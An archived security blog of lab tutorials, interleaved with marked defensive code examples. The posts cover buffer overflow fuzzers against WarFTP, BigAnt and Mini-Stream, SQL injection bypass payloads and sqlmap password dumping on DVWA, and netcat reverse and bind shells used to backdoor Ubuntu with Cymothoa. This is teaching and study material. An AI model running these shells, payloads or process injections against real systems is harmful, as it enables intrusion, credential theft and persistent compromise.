
Tuesday, February 28, 2012

The Combination of Browser Exploit & File Exploit (Revision)

In this session, I will try to combine the browser exploitation and file exploitation techniques. The first step is to make an HTML page. Inside that HTML, I insert the link to the JS file. To copy the link to the JS file, I run beef-Ng first.

Social Engineering and SET (Social Engineering Toolkit)

Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.

How To Use An Auxiliary On Metasploit


This time, I will try to give an example of using one of the auxiliary modules in Metasploit. Metasploit has a great many auxiliary modules that we can use.

I will try to use auxiliary/scanner/ftp/ftp_version.
First, I open msfconsole.

Monday, February 27, 2012

MsfPayload And MsfEncode

This time, I try to give an example of how to use msfpayload and msfencode.


A payload is the code that we want the system to execute, selected and delivered by the Framework. The msfpayload component of Metasploit allows you to generate shellcode. msfpayload is located in the directory /opt/framework/msf3/. To see the list of payloads, just type ./msfpayload -l


Saturday, February 25, 2012

Linux Exploitation

This time, I will try to share about Linux exploitation. In this session, I will exploit Backtrack Linux. First, we write the vulnerable program in C.

The script looks like this:

//I am a vulnerable thing.
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buffer[500];
    strcpy(buffer, argv[1]); //Vulnerable function
   
    return 0;
}


Wednesday, February 22, 2012

Exploit Easy Chat Server With Buffer Overflow SEH Method

This time, I'll try to exploit the Easy Chat Server application.
Because this application is connected to the network, I try to sniff it with Wireshark in Backtrack and in my virtual Windows. Next, I try to open the chat from the browser in my Backtrack.



I use admin / admin in the Name and Password fields. I can see that user and password in the Easy Chat Server application.


Well then, I try to enter the Let's Talk About Love room.

Saturday, February 18, 2012

Exploit BigAnt Server Application Buffer Overflow SEH

This time I try to exploit the BigAnt Server application with the buffer overflow SEH method. BigAnt is a server messaging application.
OK, first step: I make a fuzzer script in Python, like this.

#!/usr/bin/python
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target_address = "192.168.56.101"
target_port = 6660
# USV command followed by 2500 "A" bytes: the oversized input that crashes the server
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock.connect((target_address, target_port))
sock.send(buffer.encode())  # encode so the script also runs under Python 3
print("berhasil..berhasil..berhasil..horee")
sock.close()


Next, I open the BigAnt Server application in OllyDbg and run the fuzzer script.

Tuesday, February 14, 2012

Exploit VUPlayer with Direct Ret Method

This time, I try the buffer overflow direct RET technique again. I will try to exploit the VUPlayer application on Windows XP SP3, which I've installed in VirtualBox on my Backtrack OS.


Let's start. First, I analyze all the file types that VUPlayer supports. I got a result like this.



From the information above, I know that VUPlayer only supports the vpl, m3u, cue, pls, asx, and wax extensions. Now I open this application with OllyDbg and see information like this:

Sunday, February 12, 2012

Exploit Mini-Stream RM Mp3 Converter Direct Ret Buffer Overflow

Well, this time I will try to exploit RM MP3 Converter using the direct RET buffer overflow method from Backtrack OS. In this session, the tools I use are:
  1. Windows XP SP3 in VirtualBox
  2. Mini-Stream RM Mp3 Converter v3.1.2.1
  3. OllyDbg
  4. Pattern Create
  5. Pattern Offset
  6. Metasploit Framework
OK, first I make the fuzzer script in Python. The script I made looks like this:

#!/usr/bin/python
filename = "yuza.ram"
# A .ram playlist: a URL prefix followed by 30000 "A" characters to overflow the buffer
junk = "http://" + "A" * 30000
with open(filename, "w") as f:
    f.write(junk)
print("berhasil membuat file")


With the script above, I make a .ram file and try to overwrite the memory register with 30000 A values. Next, I run the script and a file named yuza.ram appears. Then I open that file with Mini-Stream RM MP3 Converter and boom: the converter crashes. Then I look at it in OllyDbg.

Sunday, February 5, 2012

Exploit WarFTP With Fuzzing Method (Direct RET Buffer Overflow)


In this post, I will try to exploit an application using the fuzzing method. I explained fuzzing in my previous article. OK, the application I want to exploit is WarFTP. In this session, I use these tools:
  1. OllyDbg in my Windows XP on VirtualBox.
  2. NC
  3. Metasploit Framework
  4. WarFTP server
  5. Pattern Create
  6. Pattern Offset
First, I make a simple fuzzer that sends data over the FTP protocol. The fuzzer script is written in Python. The script looks like this:

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41" * 1000  # 1000 "A" bytes sent as the FTP user name
s.connect(('192.168.56.101', 21))
data = s.recv(1024)  # read the server banner first
print("sending evil data via USER command..")
s.send(('USER ' + buffer + '\r\n').encode())  # encode so it also runs under Python 3
data = s.recv(1024)
s.send(('PASS PASSWORD ' + '\r\n').encode())
s.close()
print("Finish")

I named that file xfuzz.py. Next, I open WarFTP in my Windows XP VirtualBox machine and start the WarFTP service. The WarFTP status is then IDLE. Then I connect to the FTP server from my Backtrack using nc, with the command nc 192.168.56.101 21. If it connects, a notice like this appears:
Next, I run the xfuzz.py file I made earlier with the command python xfuzz.py to see what happens to WarFTP. And wow, WarFTP CRASHES. I try to open WarFTP again, but an error message like this appears.

Saturday, February 4, 2012

Definition and Installation OllyDbg

OllyDbg is a 32-bit assembler-level analysing debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful when source is unavailable. OllyDbg is often used for reverse engineering of programs. It is also often used by crackers to crack software made by other developers. You can download OllyDbg here. To install it, you just need to extract the zip file you downloaded.
Then just run the OLLYDBG file that has the .exe extension.

Friday, February 3, 2012

Register Memory

A register is a small memory with very high-speed access.

Registers are used to store the data and instructions currently being processed, while data and instructions queued for processing are stored in main memory. The registers in the CPU consist of:

1. Instruction Register (IR), used to store the instruction that is being processed.

2. Program Counter (PC), the register used to store the main-memory address of the instruction that is being processed. While processing is under way, the contents of the PC are changed to the main-memory address of the next instruction to be processed. This makes it possible to follow the trail of the next instruction in main memory.

3. General-purpose registers, which have a wide range of functions associated with the data being processed. For example, when one holds the data being processed it is referred to as an operand register, whereas when it holds the result of processing it is known as an accumulator.

4. Memory Data Register (MDR), the register used to hold data or an instruction sent from main memory to the CPU, or to hold data that will be saved to main memory as a result of CPU processing.

5. Memory Address Register (MAR), used to hold the address in main memory of the data or instruction to be fetched, or where it will be placed.

Now, most computers use nine 32-bit registers, which are:
EAX : Extended Accumulator Register
EBX : Extended Base Register
ECX : Extended Counter Register
EDX : Extended Data Register
ESI : Extended Source Index
EDI : Extended Destination Index
EBP : Extended Base Pointer
ESP : Extended Stack Pointer
EIP : Extended Instruction Pointer

Definition of Fuzzing and Fuzzer

Fuzzing is a black-box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion.

Application fuzzing

Whatever the fuzzed system is, the attack vectors are within its I/O. For a desktop app:
- the UI (testing all the button sequences / text inputs)
- the command-line options
- the import/export capabilities (see file format fuzzing below)
For a web app: URLs, forms, user-generated content, RPC requests, ...

The advantage of fuzzing is that the test design is extremely simple, and free of preconceptions about system behavior.
The systematic/random approach allows this method to find bugs that would often have been missed by human eyes. Plus, when the tested system is totally closed (say, a SIP phone), fuzzing is one of the only means of reviewing its quality.

The purpose of fuzzing relies on the assumption that there are bugs within every program, waiting to be discovered. Therefore, a systematic approach should find them sooner or later.
Fuzzing can add another point of view to classical software testing techniques (hand code review, debugging) because of its non-human approach. It doesn't replace them, but is a reasonable complement, thanks to the limited work needed to put the procedure in place.

A fuzzer is a program which automatically injects semi-random data into a program/stack and detects bugs.
The data-generation part is made of generators, and vulnerability identification relies on debugging tools. Generators usually use combinations of static fuzzing vectors (known-to-be-dangerous values), or totally random data. New-generation fuzzers use genetic algorithms to link injected data and observed impact. Such tools are not public yet.
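The two generator kinds named above, static known-dangerous vectors and semi-random mutation, and the debugger-side step of telling expected rejections from real failures, as an added Python illustration that is not from the original post. The target parse_record, its "name:length:payload" record format and its defect are constructed for this example; everything else is the fuzzing loop itself.

```python
import random

# Constructed toy parser standing in for the program under test. The record
# format "<name>:<length>:<payload>" and the defect below are made up here.
def parse_record(data):
    name, length, payload = data.split(":", 2)
    if int(length) != len(payload):
        raise ValueError("length mismatch")
    # Defect: assumes the name is never empty, so name[0] can raise IndexError.
    kind = "system" if name[0] == "_" else "user"
    return kind, name, payload

# Static fuzzing vectors: known-to-be-dangerous values, as the text describes.
STATIC_VECTORS = ["", ":", "0", "-1", "2147483648", "A" * 5000, "\x00", "%s%n", "\u202e"]

# Rejections the parser is documented to produce; anything else is a finding.
EXPECTED = (ValueError,)

def field_substitutions(seed, sep=":"):
    """Structure-aware generator: replace one field at a time with each vector."""
    fields = seed.split(sep)
    for i in range(len(fields)):
        for vec in STATIC_VECTORS:
            yield sep.join(fields[:i] + [vec] + fields[i + 1:])

def random_mutations(seed, rng, count):
    """Semi-random generator: bit flips, deletions and duplications of the seed."""
    for _ in range(count):
        data = list(seed)
        for _ in range(rng.randint(1, 4)):
            if not data:
                break
            op = rng.choice(("flip", "delete", "dup"))
            i = rng.randrange(len(data))
            if op == "flip":
                data[i] = chr(ord(data[i]) ^ (1 << rng.randrange(8)))
            elif op == "delete":
                del data[i:i + rng.randint(1, 3)]
            else:
                data[i:i] = data[i:i + rng.randint(1, 3)]
        yield "".join(data)

def fuzz(target, seeds, iterations=2000, rng_seed=1):
    """Run every generated case; keep the first input per unexpected exception type."""
    rng = random.Random(rng_seed)
    findings = {}
    for seed in seeds:
        cases = list(field_substitutions(seed))
        cases += list(random_mutations(seed, rng, iterations))
        for case in cases:
            try:
                target(case)
            except EXPECTED:
                continue                      # documented rejection, not a bug
            except Exception as exc:          # crash-equivalent in a native target
                findings.setdefault(type(exc).__name__, case)
    return findings

if __name__ == "__main__":
    for exc_name, case in fuzz(parse_record, ["user:5:hello"]).items():
        print(exc_name, repr(case))
```

The structure-aware pass finds the defect on the very first substitution (an empty name field), which is the point the text makes about static vectors: they hit boundary conditions that random mutation reaches only by chance. In a real harness the "unexpected exception" branch is replaced by a debugger or crash monitor watching the native process, exactly as the posts above do with OllyDbg.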

Thursday, February 2, 2012

Information Gathering Advanced

You can download the file here.

mkfifo

The mkfifo() function shall create a new FIFO special file named by the pathname pointed to by path. The file permission bits of the new FIFO shall be initialized from mode. The file permission bits of the mode argument shall be modified by the process' file creation mask.
When bits in mode other than the file permission bits are set, the effect is implementation-defined.
If path names a symbolic link, mkfifo() shall fail and set errno to [EEXIST].
The FIFO's user ID shall be set to the process' effective user ID. The FIFO's group ID shall be set to the group ID of the parent directory or to the effective group ID of the process. Implementations shall provide a way to initialize the FIFO's group ID to the group ID of the parent directory. Implementations may, but need not, provide an implementation-defined way to initialize the FIFO's group ID to the effective group ID of the calling process.
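The mkfifo() semantics quoted above, checked from Python with os.mkfifo, as an added example that is not part of the original post: the permission bits are reduced by the file creation mask, the result really is a FIFO, and a path that names a symbolic link (even a dangling one) is refused with EEXIST. The directory, file names and umask value are constructed for the demo; it assumes a POSIX system.

```python
import errno
import os
import stat
import tempfile

def mkfifo_demo(directory, requested_mode=0o666, umask=0o022):
    """Create a FIFO and report how the POSIX mkfifo() rules show up.

    Returns the effective permission bits, whether the node is a FIFO, and
    the errno raised when the target path is a symbolic link.
    """
    fifo_path = os.path.join(directory, "data")       # same name as in the post
    link_path = os.path.join(directory, "data-link")  # constructed symlink name
    old_umask = os.umask(umask)                       # process' file creation mask
    try:
        os.mkfifo(fifo_path, requested_mode)
        st = os.lstat(fifo_path)
        # "The file permission bits of the mode argument shall be modified by
        # the process' file creation mask."
        effective_mode = stat.S_IMODE(st.st_mode)
        is_fifo = stat.S_ISFIFO(st.st_mode)
        # "If path names a symbolic link, mkfifo() shall fail and set errno to
        # [EEXIST]" - true even when the link points nowhere.
        os.symlink(os.path.join(directory, "does-not-exist"), link_path)
        try:
            os.mkfifo(link_path, requested_mode)
            symlink_errno = None
        except OSError as exc:
            symlink_errno = exc.errno
    finally:
        os.umask(old_umask)
    return {
        "is_fifo": is_fifo,
        "effective_mode": effective_mode,
        "expected_mode": requested_mode & ~umask & 0o777,
        "symlink_errno": symlink_errno,
        "symlink_is_eexist": symlink_errno == errno.EEXIST,
    }

def run_in_tempdir():
    """Run the demo in a throw-away directory so nothing is left behind."""
    with tempfile.TemporaryDirectory() as d:
        return mkfifo_demo(d)

if __name__ == "__main__":
    for key, value in run_in_tempdir().items():
        print("%-18s %s" % (key, oct(value) if "mode" in key else value))
```

Two practical consequences for a defender follow from these rules: because mkfifo() honours the umask, a FIFO created by an unprivileged user in a shared directory is usually mode 0644 and readable by others, and because it refuses symlinks it cannot be used to redirect a write through a planted link. A FIFO sitting in a world-writable directory with a shell attached to both ends, the arrangement the post below builds, is unusual enough that `find / -xdev -type p` is a cheap first triage step when investigating a host.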


I try to infect Ubuntu in VBox with Cymothoa using nc from my Backtrack. The version of nc in Ubuntu is different from the nc in Backtrack: Backtrack has nc traditional, while Ubuntu has the OpenBSD nc.
OpenBSD nc has no -e option to execute a program after connecting, so I use mkfifo instead.
First, in the Ubuntu terminal I type the command mkfifo data. After that I type the command
nc -lk 8899 < data | /bin/bash > data
Now I open the console on my Backtrack and type the command nc 192.168.56.101 8899
From the picture above, I know that I have entered /bin/bash on Ubuntu. Then I look at the Ubuntu processes with the command ps -ax
Last, I enter the cymothoa directory and inject the /bin/bash process on Ubuntu with the command ./cymothoa -p 1415 -s 0, and I have succeeded in infecting it.

ByPass Login Form Localhost/fbip With SQLi

Now I try to bypass a login form at localhost/fbip.
In the username field, I type the SQL cheat-sheet payload '1 or 1=1#
Well, I got a result like this.

Finished; I have succeeded in bypassing it.

Exploit DVWA File SQL Injection & Blind SQL Injection by Using SQLMAP

Now I try to exploit the DVWA SQL Injection and Blind SQL Injection pages using sqlmap.
First, I will check the difference between SQL Injection and Blind SQL Injection.
How to check it? Open the Damn Vulnerable Web Application (DVWA).
Then I change the security level to low, as in the picture below.
OK, now let's check the difference between the two. Click on the menu SQL Injection, then in the User ID field type '1, and an error message like this appears:

Then I click on the menu SQL Injection (Blind) and type '1 in the User ID field. The result is like this:

So, from the results above, I can conclude that in SQL Injection, when we type '1, an error message is shown, but in SQL Injection (Blind), when we type '1, it just returns to the same page.
OK, next I try to exploit it. First I type
'OR '1'='1' -- ' in the User ID field, and information like this appears:

Then open sqlmap.
sqlmap is located at Apps -> Information Gathering -> Database Analysis -> MySQL Analysis -> SQLMAP
Next I type the command ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" --string="Surname" --dbs

The list of databases is shown. Next, I type the command root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -D dvwa --tables to list the tables in the dvwa database. The result is like this.

Next, I type the command root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -T users --column to see what is inside the users table. The result is like this.
Then I want to see the password data, so I type the command root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=5&Submit=Submit#" --cookie="security=low; PHPSESSID=deoe27h5uel74qdvqlt96js9n0" -C password --dump

And finally I got the passwords, like this.
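The login bypass from the localhost/fbip post and the error-based versus blind distinction from this DVWA post, reproduced offline in Python against an in-memory SQLite database, as an added example that is not from the original posts or from DVWA itself. The table, accounts and response strings are constructed. The payload used is the `'OR '1'='1' -- '` form from the DVWA section, because SQLite does not treat `#` as a comment marker the way MySQL does, so the fbip payload `'1 or 1=1#` would not demonstrate the bypass here.

```python
import hashlib
import sqlite3

def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def make_db():
    """In-memory users table with two constructed sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("admin", sha256_hex("admin")), ("alice", sha256_hex("s3cret"))],
    )
    return conn

def vulnerable_login(conn, username, password):
    """Login check with the defect the posts exploit: input spliced into the SQL text."""
    query = (
        "SELECT id FROM users WHERE username = '%s' AND password_hash = '%s'"
        % (username, sha256_hex(password))
    )
    return conn.execute(query).fetchone() is not None

def safe_login(conn, username, password):
    """Same check with bound parameters: values never become part of the SQL grammar."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password_hash = ?",
        (username, sha256_hex(password)),
    ).fetchone()
    return row is not None

# Payload from the DVWA post. After splicing, the WHERE clause reads
#   username = ''OR '1'='1' -- ' AND password_hash = '...'
# so '1'='1' is always true and "--" turns the password comparison into a comment.
BYPASS_PAYLOAD = "'OR '1'='1' -- '"

def login_response(conn, username, password, verbose_errors):
    """What a client sees from the vulnerable check in the two modes the post compares:
    with verbose errors (the SQL Injection page) the database error is echoed back;
    without them (the Blind page) every failure looks like the plain login page."""
    try:
        authenticated = vulnerable_login(conn, username, password)
    except sqlite3.OperationalError as exc:
        return "error: %s" % exc if verbose_errors else "login"
    return "welcome" if authenticated else "login"

if __name__ == "__main__":
    db = make_db()
    print("payload vs vulnerable check:   ", vulnerable_login(db, BYPASS_PAYLOAD, "x"))
    print("payload vs parameterised check:", safe_login(db, BYPASS_PAYLOAD, "x"))
    print("'1 with errors shown: ", login_response(db, "'1", "x", True))
    print("'1 with errors hidden:", login_response(db, "'1", "x", False))
```

The parameterised version is the fix for both posts: the payload is compared against the username column as an ordinary string and matches nobody. Hiding error messages, the difference between the two DVWA pages, only changes what the attacker sees, not whether the query is injectable, which is why sqlmap still works against the blind page using the `--string` match the post passes it.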



Shodan

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters.
Shodan searches for all the information about the server software: what options the service supports, a welcome message, or anything else that the client would like to know before interacting with the server.

For example, the following is an FTP banner:
220 kcg.cz FTP server (Version 6.00LS) ready.
This tells us a potential name of the server (kcg.cz), the type of FTP server (Solaris ftpd) and its version (6.00LS). For HTTP, a banner looks like:
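A parser for the banner format just shown, as an added Python example that is not from the original post. It splits the three-digit FTP reply code from the greeting text and pulls out the host, product and version fields where the greeting has a recognisable shape; the first sample banner is the one quoted above, the other two are constructed in the greeting formats vsFTPd and ProFTPD commonly emit. Note that the post's identification of the first banner as Solaris ftpd is an inference, not text present in the banner, so the parser leaves product empty for it.

```python
import re

# Constructed sample banners: the first is quoted in the post, the other two
# follow the greeting formats that vsFTPd and ProFTPD commonly emit.
SAMPLE_BANNERS = [
    "220 kcg.cz FTP server (Version 6.00LS) ready.",
    "220 (vsFTPd 3.0.3)",
    "220 ProFTPD 1.3.5 Server (Debian) [::ffff:10.0.0.5]",
]

# Every FTP reply starts with a three-digit status code, then a space or "-".
STATUS_LINE = re.compile(r"^(?P<code>\d{3})[ -](?P<text>.*)$")

# Greeting shapes to pick apart; the first match wins.
GREETINGS = [
    # "<host> FTP server (Version X) ready." - the style quoted on the page
    re.compile(r"^(?P<host>\S+)\s+FTP server\s+\(Version\s+(?P<version>[^)]+)\)\s*ready\.?$", re.I),
    # "(vsFTPd X)"
    re.compile(r"^\((?P<product>vsFTPd)\s+(?P<version>[^)]+)\)$", re.I),
    # "ProFTPD X Server ..."
    re.compile(r"^(?P<product>ProFTPD)\s+(?P<version>\S+)\s+Server\b", re.I),
]

def parse_ftp_banner(line):
    """Return code, host, product and version from one banner line,
    or None when the line is not an FTP reply at all."""
    m = STATUS_LINE.match(line.strip())
    if not m:
        return None
    info = {"code": int(m.group("code")), "host": None, "product": None,
            "version": None, "text": m.group("text")}
    for pattern in GREETINGS:
        g = pattern.match(info["text"])
        if g:
            info.update(g.groupdict())
            break
    return info

def exposure_report(banners):
    """One line per banner summarising which identifying fields it gives away."""
    report = []
    for banner in banners:
        info = parse_ftp_banner(banner)
        if info is None:
            report.append("not an FTP reply: %r" % banner)
            continue
        leaked = [k for k in ("host", "product", "version") if info[k]]
        report.append("code %d leaks %s" % (info["code"], ", ".join(leaked) or "nothing specific"))
    return report

if __name__ == "__main__":
    for line in exposure_report(SAMPLE_BANNERS):
        print(line)
```

Run over your own exposed services, the report shows what a Shodan indexer learns before any authentication. Most FTP daemons let you replace the greeting with a neutral one (vsftpd's `ftpd_banner` directive, for instance), which removes the version from the index without changing the service.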

Wednesday, February 1, 2012

Maltego

In this session, I will try to discuss Maltego. Maltego is a tool used for information gathering. Maltego is a unique platform developed to deliver a clear threat picture of the environment that an organization owns and operates.
  1. Maltego is a program that can be used to determine the relationships and real-world links between:
     • People
     • Groups of people (social networks)
     • Companies
     • Organizations
     • Web sites
  2. Internet infrastructure such as:
     • Domains
     • DNS names
     • Netblocks
     • IP addresses
  3. Phrases
  4. Affiliations
  5. Documents and files
  6. These entities are linked using open-source intelligence.
  7. Maltego is easy and quick to install - it uses Java, so it runs on Windows, Mac and Linux.
  8. Maltego provides you with a graphical interface that makes seeing these relationships instant and accurate - making it possible to see hidden connections.
  9. Using the graphical user interface (GUI) you can see relationships easily - even if they are three or four degrees of separation away.
  10. Maltego is unique because it uses a powerful, flexible framework that makes customizing possible. As such, Maltego can be adapted to your own, unique requirements.
  11. Maltego can be used for the information gathering phase of all security-related work. It will save you time and will allow you to work more accurately and smarter.
  12. Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
  13. Maltego provides you with a much more powerful search, giving you smarter results.
  14. If access to "hidden" information determines your success, Maltego can help you discover it.

Put Cymothoa to Ubuntu Part 2 by Using NC

OK, this article is a continuation of the previous article about backdooring Ubuntu with nc.
Because the version of nc in my Ubuntu VBox is different from the nc in my Backtrack, the first step is to copy the files nc.traditional, nc, and netcat in the directory /root/bin from my Backtrack to Ubuntu using SSH.
After that, I put those files into the directory /bin.
OK, next I open nc in Backtrack and type the command nc -l -v -p 8899
Then in Ubuntu I type the command nc 192.168.56.1 8899 -e /bin/bash in the terminal.
Then a notice appears that the nc server is connected to the nc client.


root@bt:~# nc -l -v -p 8899
listening on [any] 8899 ...
192.168.56.101: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 44565
Then I type ls from my Backtrack and the contents of the Ubuntu directory appear, like this.
OK, next I copy the cymothoa folder from my Backtrack to my Ubuntu, also using ssh, and then from my Backtrack, which is connected to Ubuntu, I try to start cymothoa.

Then I type ps -ax to see the processes on Ubuntu.
Last, I type the command ./cymothoa -p 1409 -s 0 -y 8899 to infect Ubuntu. The result is like this.
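Both Cymothoa posts reach the shell through a netcat process that shows up in `ps -ax`, either with `-e /bin/bash` or as a listener feeding a FIFO. As an added example that is not part of the original posts, here is the detection side of that: a Python scanner that parses a constructed `ps -ax` listing (the netcat command lines copy the ones typed above; PIDs and the other processes are made up) and flags netcat invocations that execute a program or listen for connections.

```python
import os
import re

# Constructed sample in the shape of "ps -ax" output. The netcat command lines
# mirror the ones typed in the posts; PIDs and the other entries are made up.
SAMPLE_PS_OUTPUT = """\
  PID TTY      STAT   TIME COMMAND
    1 ?        Ss     0:01 /sbin/init
  812 ?        Ss     0:00 /usr/sbin/sshd -D
 1401 pts/0    Ss     0:00 bash
 1409 pts/0    S+     0:00 nc 192.168.56.1 8899 -e /bin/bash
 1413 pts/1    S+     0:00 nc -lk 8899
 1415 pts/1    S+     0:00 /bin/bash
 1502 pts/2    S+     0:00 nc -zv 192.168.56.1 22
 1600 ?        S      0:00 /usr/bin/python3 /opt/app/server.py
"""

PS_LINE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<tty>\S+)\s+(?P<stat>\S+)\s+(?P<time>\S+)\s+(?P<cmd>.+)$"
)
NETCAT_NAMES = {"nc", "netcat", "nc.traditional", "ncat"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe"}

def parse_ps(text):
    """Turn ps -ax style output into a list of {pid, cmd} records, skipping the header."""
    procs = []
    for line in text.splitlines():
        m = PS_LINE.match(line)
        if m:
            procs.append({"pid": int(m.group("pid")), "cmd": m.group("cmd").strip()})
    return procs

def classify(cmd):
    """Rules that fire on one command line; an empty list means nothing suspicious."""
    tokens = cmd.split()
    if not tokens or os.path.basename(tokens[0]) not in NETCAT_NAMES:
        return []
    rules = []
    for i, tok in enumerate(tokens[1:], start=1):
        # -e / -c hand the connection to a program (nc traditional, ncat)
        if tok in ("-e", "-c") and i + 1 < len(tokens):
            prog = os.path.basename(tokens[i + 1])
            rules.append("netcat-exec-shell" if prog in SHELLS else "netcat-exec")
        # any option cluster containing "l" puts netcat into listen mode (-l, -lk, -lvp)
        elif re.fullmatch(r"-[A-Za-z]+", tok) and "l" in tok[1:]:
            rules.append("netcat-listener")
    return rules

def scan(text):
    """Map pid -> fired rules for every flagged netcat process in the listing."""
    hits = {}
    for proc in parse_ps(text):
        rules = classify(proc["cmd"])
        if rules:
            hits[proc["pid"]] = rules
    return hits

if __name__ == "__main__":
    for pid, rules in sorted(scan(SAMPLE_PS_OUTPUT).items()):
        print(pid, ", ".join(rules))
```

Command-line heuristics like these are a starting point, not proof: the first post copies its own nc binaries onto the box, so the name can be anything, and the FIFO variant hides the shell behind an ordinary `/bin/bash` entry. Corroborate with `ss -ltnp` for the unexpected listener on 8899 and with `/proc/<pid>/fd` for a bash whose standard input and output are a socket or a FIFO rather than a terminal, and treat the injected process from the cymothoa step as suspect whatever its command line says.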